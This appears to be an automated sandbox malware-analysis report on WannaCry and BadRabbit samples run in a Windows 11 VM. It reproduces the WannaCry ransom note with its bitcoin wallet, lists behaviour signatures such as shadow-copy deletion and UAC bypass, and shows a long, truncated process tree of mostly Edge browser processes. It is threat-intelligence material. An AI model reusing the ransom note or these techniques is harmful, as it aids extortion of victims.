Resubmissions

15-08-2024 09:58

240815-lzq5waxdjd 10

14-08-2024 19:14

240814-xx1r3sthjr 3

Analysis

  • max time kernel
    851s
  • max time network
    853s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    15-08-2024 09:58

Errors

Reason
Machine shutdown

General

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\@[email protected]

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �
Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Signatures

  • BadRabbit

    Ransomware family discovered in late 2017, mainly targeting Russia and Ukraine.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Wannacry

    WannaCry is a ransomware cryptoworm.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Disables RegEdit via registry modification 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 55 IoCs
  • Loads dropped DLL 12 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops desktop.ini file(s) 2 IoCs
  • File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Modifies WinLogon 2 TTPs 3 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 3 IoCs
  • Drops file in Windows directory 8 IoCs
  • Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 6 IoCs

    When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 7 IoCs
  • Modifies Control Panel 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 8 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • NTFS ADS 25 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 63 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 51 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of SetWindowsHookEx 34 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 5 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://collegestpaul.nl
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1188
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffbd7183cb8,0x7ffbd7183cc8,0x7ffbd7183cd8
      2⤵
        PID:3280
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1928 /prefetch:2
        2⤵
          PID:2172
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4588
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2660 /prefetch:8
          2⤵
            PID:2956
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
            2⤵
              PID:3876
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
              2⤵
                PID:4324
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4960 /prefetch:1
                2⤵
                  PID:2248
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1
                  2⤵
                    PID:1072
                  • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:8
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1148
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
                    2⤵
                      PID:1276
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
                      2⤵
                        PID:4236
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5180 /prefetch:8
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:1548
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:1
                        2⤵
                          PID:4676
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
                          2⤵
                            PID:3104
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5092 /prefetch:8
                            2⤵
                              PID:4324
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5076 /prefetch:8
                              2⤵
                              • Modifies registry class
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4372
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
                              2⤵
                                PID:3248
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
                                2⤵
                                  PID:2772
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:1
                                  2⤵
                                    PID:1512
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:1
                                    2⤵
                                      PID:1900
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
                                      2⤵
                                        PID:668
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
                                        2⤵
                                          PID:3304
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1
                                          2⤵
                                            PID:1164
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:1
                                            2⤵
                                              PID:796
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
                                              2⤵
                                                PID:1648
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:1
                                                2⤵
                                                  PID:4616
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:1
                                                  2⤵
                                                    PID:3128
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5332 /prefetch:1
                                                    2⤵
                                                      PID:392
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
                                                      2⤵
                                                        PID:4668
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1
                                                        2⤵
                                                          PID:1636
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:1
                                                          2⤵
                                                            PID:408
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
                                                            2⤵
                                                              PID:1400
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:1
                                                              2⤵
                                                                PID:988
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4768 /prefetch:2
                                                                2⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:752
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6180 /prefetch:1
                                                                2⤵
                                                                  PID:1620
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4664 /prefetch:1
                                                                  2⤵
                                                                    PID:4760
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6132 /prefetch:1
                                                                    2⤵
                                                                      PID:4952
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:1
                                                                      2⤵
                                                                        PID:2276
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1
                                                                        2⤵
                                                                          PID:2336
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1828 /prefetch:1
                                                                          2⤵
                                                                            PID:3608
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5556 /prefetch:8
                                                                            2⤵
                                                                            • NTFS ADS
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:4680
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6172 /prefetch:8
                                                                            2⤵
                                                                            • NTFS ADS
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:904
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1524 /prefetch:1
                                                                            2⤵
                                                                              PID:1420
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
                                                                              2⤵
                                                                                PID:2620
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6832 /prefetch:1
                                                                                2⤵
                                                                                  PID:3400
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:1
                                                                                  2⤵
                                                                                    PID:4700
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1780 /prefetch:1
                                                                                    2⤵
                                                                                      PID:4760
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5956 /prefetch:8
                                                                                      2⤵
                                                                                      • NTFS ADS
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:4460
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6580 /prefetch:8
                                                                                      2⤵
                                                                                      • NTFS ADS
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:3360
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6904 /prefetch:1
                                                                                      2⤵
                                                                                        PID:3084
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6340 /prefetch:8
                                                                                        2⤵
                                                                                        • NTFS ADS
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:4680
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
